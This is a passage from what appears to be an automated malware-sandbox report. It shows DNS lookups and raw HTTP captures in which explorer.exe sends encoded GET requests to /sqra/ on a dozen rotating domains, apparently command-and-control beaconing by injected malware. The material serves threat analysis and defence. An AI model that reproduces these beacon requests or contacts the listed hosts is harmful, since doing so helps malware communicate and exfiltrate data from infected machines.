                                                                        Apr 8, 2021 13:01:53.510649920 CEST8.8.8.8192.168.2.30xefdfNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:58.843024969 CEST8.8.8.8192.168.2.30xc268Server failure (2)www.myboardinghome.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:04.030394077 CEST8.8.8.8192.168.2.30x4492Name error (3)www.seymor-law.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:09.082026958 CEST8.8.8.8192.168.2.30x8a9fNo error (0)www.lewishackney.comlewishackney.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:02:09.082026958 CEST8.8.8.8192.168.2.30x8a9fNo error (0)lewishackney.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:14.369541883 CEST8.8.8.8192.168.2.30xeeacNo error (0)www.shopthen2.site5.101.152.161A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:19.633713007 CEST8.8.8.8192.168.2.30x9bc4No error (0)www.kaashir.com208.91.197.27A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.karizcustomizeme.com
                                                                        • www.luxel01.com
                                                                        • www.orchidandiris.com
                                                                        • www.anadelalastra.art
                                                                        • www.ecomcourse.online
                                                                        • www.huongdandidong.com
                                                                        • www.muzhskoy-eskort.site
                                                                        • www.simplyhealrhcareplans.com
                                                                        • www.socialunified.com
                                                                        • www.lewishackney.com
                                                                        • www.shopthen2.site

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.349720160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:00:59.241127968 CEST1246OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1
                                                                        Host: www.karizcustomizeme.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:00:59.275954008 CEST1246INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.349722118.27.122.1980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:04.899665117 CEST1249OUTGET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.luxel01.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:05.137732983 CEST1250INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 11:01:05 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        10192.168.2.3497435.101.152.16180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:02:14.417071104 CEST5418OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1
                                                                        Host: www.shopthen2.site
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:02:14.472712994 CEST5418INHTTP/1.1 404 Not Found
                                                                        Server: nginx-reuseport/1.13.4
                                                                        Date: Thu, 08 Apr 2021 11:02:14 GMT
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Content-Length: 285
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 72 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 74 68 65 6e 32 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqra/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.shopthen2.site Port 80</address></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        11192.168.2.349745160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:02:25.046103954 CEST5430OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1
                                                                        Host: www.karizcustomizeme.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:02:25.084101915 CEST5430INHTTP/1.1 400 Bad Request
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.34972434.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:10.195719004 CEST1254OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1
                                                                        Host: www.orchidandiris.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:10.374289989 CEST1255INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:01:10 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606eb0b7-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.349725198.185.159.14480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:15.579214096 CEST1258OUTGET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.anadelalastra.art
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:15.762191057 CEST1259INHTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Thu, 08 Apr 2021 11:01:15 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: QiQXTyH2/TdPoyy5I
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.349727184.168.131.24180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:26.191338062 CEST1314OUTGET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.ecomcourse.online
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:26.698020935 CEST1314INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.16.1
                                                                        Date: Thu, 08 Apr 2021 11:01:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: http://www.udemy.com/course/ecom-dropshipping/?referralCode=A72F9D646A0B66840647
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.349731108.186.210.14280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:32.580770969 CEST1371OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1
                                                                        Host: www.huongdandidong.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:32.746746063 CEST1371INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 10:59:41 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 36 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 6a 73 2f 77 77 64 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 69<html><head><script type='text/javascript' src='/js/wwd.js'></script></head><body></script></body></html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.349737144.76.207.7680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:37.939346075 CEST5389OUTGET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.muzhskoy-eskort.site
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.349738199.59.242.15380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:43.214939117 CEST5390OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1
                                                                        Host: www.simplyhealrhcareplans.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:43.326561928 CEST5391INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:01:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_b89+lPyWjYN9+1Zxni+v+D9UpCJXk1dtxqTBtQwgoRWYYdonh2ztCrm4uICYDrm/6PgZmwfEMYmMBlTR9b4jKA==
                                                                        Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 38 39 2b 6c 50 79 57 6a 59 4e 39 2b 31 5a 78 6e 69 2b 76 2b 44 39 55 70 43 4a 58 6b 31 64 74 78 71 54 42 74 51 77 67 6f 52 57 59 59 64 6f 6e 68 32 7a 74 43 72 6d 34 75 49 43 59 44 72 6d 2f 36 50 67 5a 6d 77 66 45 4d 59 6d 4d 42 6c 54 52 39 62 34 6a 4b 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                        Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_b89+lPyWjYN9+1Zxni+v+D9UpCJXk1dtxqTBtQwgoRWYYdonh2ztCrm4uICYDrm/6PgZmwfEMYmMBlTR9b4jKA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.3497393.223.115.18580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:53.613534927 CEST5397OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1
                                                                        Host: www.socialunified.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:53.714488029 CEST5397INHTTP/1.1 302 Found
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Location: https://www.hugedomains.com/domain_profile.cfm?d=socialunified&e=com
                                                                        Server: Microsoft-IIS/8.5
                                                                        X-Powered-By: ASP.NET
                                                                        Date: Thu, 08 Apr 2021 11:01:47 GMT
                                                                        Connection: close
                                                                        Content-Length: 189
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 73 6f 63 69 61 6c 75 6e 69 66 69 65 64 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=socialunified&amp;e=com">here</a>.</h2></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.34974134.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:02:09.097908020 CEST5407OUTGET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.lewishackney.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:02:09.276810884 CEST5410INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:02:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
